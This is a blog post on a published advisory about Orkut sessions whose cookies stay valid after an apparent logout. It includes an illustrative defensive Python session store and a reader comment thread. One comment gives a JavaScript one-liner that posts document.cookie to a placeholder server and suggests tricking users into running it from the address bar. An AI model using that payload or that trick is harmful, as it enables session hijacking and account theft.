Researcher Susam Pal published an interesting advisory today about several vulnerabilities affecting Orkut, the well-known social networking website owned by Google.
One case works like this: when an operation fails, the application may send the user back to the main page and ask them to log in again, without actually logging them out. This can mislead users into believing they have logged out.
An attacker can use this state to take over the account. At this stage the “orkut_state” cookie can still be used to log in successfully, even though the user appears to have logged out. This is probably due to a failure to mark the session as expired on the server side.
How? A technical description (never use this information to hack anyone else's account)
On successful Orkut login, the following cookies are set:
1. Domain: .www.orkut.com Cookie: orkut_state
2. Domain: .google.com Cookie: SID
3. Domain: www.google.com Cookie: LSID
The second and third cookies are responsible for another flaw described in this advisory. On the Orkut login page, the login form is served from google.com in an inline frame and the form inputs are submitted back to google.com. Hence these cookies are set for the domains google.com and www.google.com.
If an attacker manages to steal the SID and LSID cookies of the user, he can gain access to the compromised account even after the user has been logged out, as described in the ‘Vulnerability’ section.
If authentication fails during a session and the user finds himself logged out, and he then leaves the browser unattended, a trespasser can log in to his account simply by accessing a valid URL for his account, as described in the ‘Vulnerability’ section.
Vulnerability:
When an Orkut user fails to authenticate during a session (say, while deleting a community), the user is redirected to a login page where he has to enter his password to log in again. At this stage, ideally the session should be disabled and re-enabled only after the user re-authenticates. However, the session associated with the SID and LSID cookies remains alive on the server side. Therefore, it is not safe to abandon the session at this stage. An attacker can set these cookies in his browser and access the compromised account by visiting http://www.gmail.com/, https://www.google.com/accounts/ManageAccount, etc.
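The fix the advisory asks for, disabling the session at the re-login prompt and re-enabling it only after the user re-authenticates, can be shown with a small server-side session store. The Python below is an added example written for this page; it is not code from Orkut, Google or the advisory. The store, its "active"/"suspended"/"revoked" states, the identifier rotation on re-authentication and the cookie name `session` are assumptions made for the illustration.

```python
import secrets
import time
from dataclasses import dataclass
from typing import Dict, Optional

# Hypothetical server-side session store (not Orkut's or Google's code).
# Lifecycle demonstrated: a session that hits a failed authentication check
# is suspended; a correct password revokes the old identifier and issues a
# new one; logout deletes the server-side record, so a copied cookie value
# stops working instead of staying alive on the server.


@dataclass
class Session:
    user: str
    created: float
    state: str = "active"  # "active" | "suspended" | "revoked"


class SessionStore:
    def __init__(self) -> None:
        self._sessions: Dict[str, Session] = {}

    def login(self, user: str) -> str:
        """Create a session and return the random identifier sent in the cookie."""
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = Session(user=user, created=time.time())
        return sid

    def is_valid(self, sid: Optional[str]) -> bool:
        """Only an 'active' record on the server side makes a cookie value usable."""
        s = self._sessions.get(sid) if sid is not None else None
        return s is not None and s.state == "active"

    def suspend(self, sid: str) -> None:
        """Called when a sensitive action (e.g. deleting a community) fails its
        auth check: keep the record, but refuse it until the user re-authenticates."""
        s = self._sessions.get(sid)
        if s is not None and s.state == "active":
            s.state = "suspended"

    def reauthenticate(self, sid: str, user: str, password_ok: bool) -> Optional[str]:
        """Re-enable access only after a correct password, and rotate the identifier
        so the value that sat in the browser while suspended is dead afterwards."""
        s = self._sessions.get(sid)
        if s is None or s.state == "revoked" or s.user != user or not password_ok:
            return None
        s.state = "revoked"
        return self.login(user)

    def logout(self, sid: Optional[str]) -> None:
        """Logout must expire the session on the server, not just clear the cookie."""
        if sid is not None:
            self._sessions.pop(sid, None)


def session_cookie_header(sid: str, name: str = "session") -> str:
    """Set-Cookie line for the identifier. HttpOnly keeps document.cookie from
    exposing it to injected script; Secure keeps it off plain HTTP."""
    return f"Set-Cookie: {name}={sid}; Path=/; Secure; HttpOnly; SameSite=Lax"


def walkthrough() -> Dict[str, object]:
    """Replay the advisory's scenario against the store and collect each check."""
    store = SessionStore()
    results: Dict[str, object] = {}

    old = store.login("alice")
    results["fresh_ok"] = store.is_valid(old)

    # A sensitive operation fails its authentication check: suspend, don't abandon.
    store.suspend(old)
    results["suspended_blocked"] = store.is_valid(old)

    # Wrong password at the re-login prompt: nothing is re-enabled.
    results["bad_password"] = store.reauthenticate(old, "alice", password_ok=False)
    results["still_blocked"] = store.is_valid(old)

    # Correct password: the old identifier is revoked and a new one issued.
    new = store.reauthenticate(old, "alice", password_ok=True)
    results["old_after_reauth"] = store.is_valid(old)
    results["new_after_reauth"] = new is not None and store.is_valid(new)

    # Logout removes the record, so a copy of the cookie value is useless afterwards.
    store.logout(new)
    results["after_logout"] = store.is_valid(new)
    return results


if __name__ == "__main__":
    for check, value in walkthrough().items():
        print(f"{check:20s} {value}")
```

The important property is that validity is decided by the server-side record, never by the cookie alone: the identifier the browser held while the session was suspended is never accepted again, and a logout that only clears the client-side cookie (the failure the advisory describes) cannot happen because `logout` removes the record itself.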
Orkut has suffered from other vulnerabilities in the past, including XSS, script insertion, information disclosure, and a worm that propagated malware.
OMG! If an XSS is disclosed now, we are in great trouble. If it’s only XSS, at least we can assume we are safe after logging out. But an XSS along with this vulnerability will let the hacker use our account even after logging out. This will multiply the effect of XSS.
Pray, everyone, that nobody finds an XSS now.
The Google team has not solved this security issue yet. Many Orkut accounts have been deleted by the hackers. Thank you for this great informative post.
How can we read a cookie set by Google or any other website? Please disclose.
As Benjamin Sulva has explained, if there is an XSS flaw in Orkut it becomes very easy to steal session cookies and hack sessions.
An XSS flaw allows you to execute JavaScript in the victim’s browser. The JavaScript takes document.cookie and posts it to your server using a URL like this:
javascript:location.href='http://yourserver/yourscript?in=' + document.cookie
Even otherwise, in the absence of XSS, one can fool another user into executing the JavaScript code by putting it in the address bar and pressing enter.
Digg It
http://digg.com/security/Orkut_Accounts_being_Hacked_A_Reality
Visit the above link and click on the ‘digg it’ link below the yellow icon. More diggs can put pressure on Google to resolve this issue.
Please give me the password... my email id is djvicky2007@gmail.com
Please give me my password. Someone hacked my password, please help me. My id is sweetshweta.sakre@gmail.com
Please mail me the last four digits at tecutefun_bitts@yahoo.co.in
Thanks in advance
Thanks
Oh my god. It is still happening. My account was also hacked by someone a week ago. But I got it with a software. I thought Google provided wonderful security. But all of that is fake.
Hey guys, it is great to see that someone is trying to help... really good...